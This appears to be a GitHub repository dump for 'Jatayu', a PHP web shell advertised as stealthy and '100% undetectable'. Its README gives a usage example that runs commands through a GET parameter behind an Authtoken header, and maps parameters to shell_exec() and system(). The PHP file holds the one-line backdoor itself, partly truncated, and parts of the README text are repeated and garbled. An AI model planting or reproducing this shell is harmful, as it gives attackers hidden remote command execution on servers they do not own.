├── README.md ├── jatayu-image.png └── jatayu.php /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |
4 | JATAYU 5 |
6 |

7 | 8 |

Stealthy Stand Alone PHP Web Shell

9 | 10 |

11 | 12 | 13 | 14 | 15 |

16 | 17 | ### FEATURES 18 | - Http Header Based Authentication. 19 | - 100% Undetectable. 20 | - Exec Function Changer. 21 | - Nothing Fancy 22 | 23 | ### USAGE 24 | ``` 25 | GET /test/jatayu.php?fn=1&&cmd=whoami 26 | Host : http://test.com 27 | Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499 28 | ``` 29 | ### FUNCTIONS 30 | 31 | | PARAMETER | FUNCTION | 32 | | ----------------|:------------------------------:| 33 | | fn=1 | Calls function shell_exec() | 34 | | fn=2 | Calls function system() | 35 | | cmd=id | Executes command | 36 | 37 | ### GENERATE AUTHTOKEN 38 | ``` 39 | 46 | ``` 47 | 48 | 49 | -------------------------------------------------------------------------------- /jatayu-image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderMate/Jatayu/ed900f0db52f85c52dc552e519072375282e0ab5/jatayu-image.png -------------------------------------------------------------------------------- /jatayu.php: -------------------------------------------------------------------------------- 1 | &1');}if($fn=="2"){echo $p2($_GET['cmd'].' 2>&1');}} ?> 2 | --------------------------------------------------------------------------------

2 | 3 | 4 | JATAYU 5 | 6 |

Stealthy Stand Alone PHP Web Shell

2 | 3 |
4 | JATAYU 5 |
6 |